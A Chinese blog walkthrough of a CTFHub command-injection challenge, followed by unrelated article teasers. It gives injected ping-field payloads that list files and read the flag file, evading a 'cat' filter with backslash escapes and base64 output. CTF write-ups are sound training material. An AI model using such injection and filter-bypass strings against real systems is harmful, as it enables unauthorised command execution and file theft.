CTFHub-RCE 命令注入-过滤cat

article/2025/6/9 8:26:48

  • 观察源代码

    • 代码里面可以发现过滤了cat

  • 判断是Windows还是Linux

    • 源代码中有 
      ping -c 4
      说明是Linux

  • 查看有哪些文件

    • 127.0.0.1|ls

  • 打开flag文件

    • 我们尝试将cat转义打开这个文件 
       127.0.0.1|c\a\t flag_6562854712907.php

    • 可是发现 文本内容显示不出来,所以怀疑可能编码格式问题,有些内容无法显示(同上一节)
    • 我们尝试用base64编码 
      127.0.0.1|c\a\t flag_6562854712907.php|base64

    • 再将内容base64 解码一下

      • 成功获取flag

http://www.hkcw.cn/article/nPTrWRsvWJ.shtml

相关文章

Dota2参议院与递增的三元子序列:算法揭示策略与模式的双重世界

Dota2参议院与递增的三元子序列:算法揭示策略与模式的双重世界

博客引言: 在我们的生活中,策略与模式无处不在,它们既是解决问题的关键,也是揭示隐藏规律的钥匙。今天,我们将通过两个有趣的问题,探索算法如何在策略博弈与模式识别中发挥作用。 首先,我们将…
阅读更多...
ShenNiusModularity项目源码学习(31:ShenNius.Admin.Mvc项目分析-16)

ShenNiusModularity项目源码学习(31:ShenNius.Admin.Mvc项目分析-16)

关键词管理页面用于新建、维护、删除、导入/导出系统CMS管理模块的关键词,关键词信息用于匹配CMS管理模块新建的文章内容中相同的信息,使其点击文章中的关键词时可以跳转到关键词关联的链接。关键词管理页面的后台控制器类KeywordController位于ShenNius…
阅读更多...
ESP32-idf学习(三)esp32C3连接iot

ESP32-idf学习(三)esp32C3连接iot

一、前言 上一篇用蓝牙作为通信方式,虽然勉强完成了控制,但结果显然不是那么符合我们的预期,既然用蓝牙还需要研究一段时间,那我们就先整一些现成的,不需要研究的!iot云平台!这里当然也是通过w…
阅读更多...
五芳斋陷多重困局 业绩下滑与库存压力增大

五芳斋陷多重困局 业绩下滑与库存压力增大

端午节期间,五芳斋面临了多重挑战。2024年公司营收和净利润双双下滑,分别下降超过14%,依然高度依赖粽子销售。市场方面,公司遭遇代工企业“蜜枣粽异物”风波,品牌形象受损。此外,公司给股东送粽子礼盒的举动被网友解读为清理库存,股价也连续下跌,5月30日更是收跌超7%。…
阅读更多...
儿童节愿我们永葆童真 留住那份纯真好奇

儿童节愿我们永葆童真 留住那份纯真好奇

今天是六一儿童节,每个孩子都会慢慢长大,而每个大人也都曾是孩子。在岁月的流逝中,那颗童心始终未变。愿我们永远保持童真和对这个世界的爱与好奇,快乐、灿烂、温暖、纯粹,一直可爱。责任编辑:zhangxiaohua
阅读更多...
python里面导入yfinance的时候报错

python里面导入yfinance的时候报错

我的代码: import yfinance as yf import os proxy http://127.0.0.1:7890 # 代理设置,此处修改 os.environ[HTTP_PROXY] proxy os.environ[HTTPS_PROXY] proxydata yf.download("AAPL",start"2010-1-1",end"2021-8-1&quo…
阅读更多...
window桌面任务栏不见了鼠标移动底部无响应命令重启资源管理器无效解决办法

window桌面任务栏不见了鼠标移动底部无响应命令重启资源管理器无效解决办法

首先虽然重启是万能的,但是我不想重启啊大哥 以前喜欢用taskkill /f /im explorer 然后start explorerwindow11竟然没效果 ,所以ctrlaltdel 任务管理器 直接找到资源管理器右击重启,发现好了 {C44C69DC-D2BB-4E68-9F11-0AC2E2B5300B}.png 另外 ctrlwinsh…
阅读更多...
Rollup打包输出产物遇到的一个坑。(分享心得)

Rollup打包输出产物遇到的一个坑。(分享心得)

文章目录 前言一、rollup的generateBundle钩子?二、遇到bug之前三、bug解决总结 前言 本人在学习过程中,发现一个基于vite的项目,在打包的过程中遇到了一个bug,就是我在学习开发一个vite插件功能,我需要获取到打包的产…
阅读更多...
杭州一凶宅竞拍14轮后七五折成交 低价吸引买家

杭州一凶宅竞拍14轮后七五折成交 低价吸引买家

5月30日,杭州富阳区丁香花园蓝庭5号1703室房源在法拍平台上进行拍卖。该房源建成于2007年前后,建筑面积为200.73平方米,是一套东边套顶跃结构的房子。一层布局为二室三厅一厨二卫南北双阳台,二层则有一室(带书房、走入式衣柜)、一卫、一储藏室、一阳台和两露台。房子评估…
阅读更多...
陈伟霆说张启山回来了 爷青回热议

陈伟霆说张启山回来了 爷青回热议

2025年5月31日,电视剧《九门》正式官宣演员阵容及制作信息,在影视圈和粉丝群体中引发了广泛关注和热烈讨论。该剧由南派三叔担任原著及总监制,柏杉执导,优酷全网独播,强大的制作班底和引人入胜的剧情设定使其成为2025年最受期待的民国传奇剧之一。主演阵容方面,陈伟霆时隔…
阅读更多...
樊振东回应加盟萨尔布吕肯 迎接新挑战

樊振东回应加盟萨尔布吕肯 迎接新挑战

德甲联赛萨尔布吕肯乒乓球甲级俱乐部宣布,奥运冠军樊振东加盟。樊振东表示,他非常期待在萨尔布吕肯和德甲的新挑战,体验新的环境,并与球队一起赢得更多胜利。官宣声明发布后,莫雷加德也表示,能和樊振东成为队友感到很荣幸。责任编辑:zhangxiaohua
阅读更多...
CSS专题之层叠上下文

CSS专题之层叠上下文

前言 石匠敲击石头的第 15 次 在平常开发的时候,有时候会遇到使用 z-index 调整元素层级没有效果的情况,究其原因还是因为对层叠上下文不太了解,看了网上很多前辈的文章,决定打算写一篇文章来梳理一下,如果哪里写的有问…
阅读更多...
Python实现P-PSO优化算法优化BP神经网络回归模型项目实战

Python实现P-PSO优化算法优化BP神经网络回归模型项目实战

说明:这是一个机器学习实战项目(附带数据代码文档),如需数据代码文档可以直接到文章最后关注获取。 1.项目背景 在当今数据驱动的时代,回归分析作为预测和建模的重要工具,在科学研究和工业应用中占据着重要…
阅读更多...
07.概念三:LayerNorm和Softmax

07.概念三:LayerNorm和Softmax

参考视频:LayerNorm和Softmax概念 那我们第三部分的概念,也就是概念的最后一部分 关于LayerNorm和Softmax的概念、以及最后文字是怎么预测出来的 我们先来看一下这个layer normalization,简称layer norm层归一化。我觉得叫数字缩放&#xff0…
阅读更多...
sglang0.4.3参数说明

sglang0.4.3参数说明

执行命令: Python3 -m sglang.launch_server --model-path /mnt/data/models/DeepSeek-R1-Distill-Qwen-32B --host 172.26.*.* --port 9300 --tp 4 --trust-remote-code --served-model-name qwen32b 运行结果 响应速度 参数说明 model_path: 模型文件…
阅读更多...
DeepSeek-R1-0528,官方的端午节特别献礼

DeepSeek-R1-0528,官方的端午节特别献礼

DeepSeek:端午安康!刻在国人骨子里的浪漫 2025 年 05 月 28 日 | DeepSeek 端午特别献礼 当粽叶飘香时,DeepSeek 悄然带来一份节日惊喜 版本号 DeepSeek-R1-0528 正式上线 官方赋予它的灵魂是: 思考更深 推理更强 用户通过官网…
阅读更多...
莫雷加德说很荣幸成为樊振东队友 共同征战TTBL

莫雷加德说很荣幸成为樊振东队友 共同征战TTBL

当地时间5月31日,萨尔布吕肯乒乓球俱乐部宣布,乒乓球大满贯选手、巴黎奥运会乒乓球男单金牌得主樊振东将在下个赛季代表俱乐部参加德国乒乓球甲级联赛(TTBL)。目前效力于萨尔布吕肯俱乐部的乒乓球运动员、巴黎奥运会乒乓球男单银牌得主莫雷加德在社交媒体上表达了欢迎之情,…
阅读更多...
人民日报:有车企说反内卷却打价格战 行业协会与工信部齐发声反对

人民日报:有车企说反内卷却打价格战 行业协会与工信部齐发声反对

中国汽车工业协会发布《关于维护公平竞争秩序,促进行业健康发展的倡议》,明确表示反对近期车企掀起的新一轮“价格战”。工信部也表态支持该倡议,强调“价格战”没有赢家。这一信号和态度有助于及时遏制无序的价格竞争。近年来,一些车企虽然口头上反对“内卷式”竞争,但实…
阅读更多...
深入剖析Java类加载机制:双亲委派模型的突破与实战应用

深入剖析Java类加载机制:双亲委派模型的突破与实战应用

引言:一个诡异的NoClassDefFoundError 某金融系统在迁移到微服务架构后,突然出现了一个诡异问题:在调用核心交易模块时,频繁抛出NoClassDefFoundError,但类明明存在于classpath中。经过排查,发现是由于不同…
阅读更多...
在屈原的家乡端午节是什么样 三次端午持续近一月

在屈原的家乡端午节是什么样 三次端午持续近一月

端午节作为中国最古老的节日之一,其中以纪念屈原的习俗影响最为广泛。屈原出生于战国时期的湖北秭归,这里不仅保留着典型的屈原故里端午习俗,还有“端午比年大”的说法。在屈原的家乡湖北秭归乐平里,四面群山环抱,不远处是长江支流香溪河。据古籍记载,秭归“县北一百六十…
阅读更多...
推荐文章

Copyright @ 2022~2023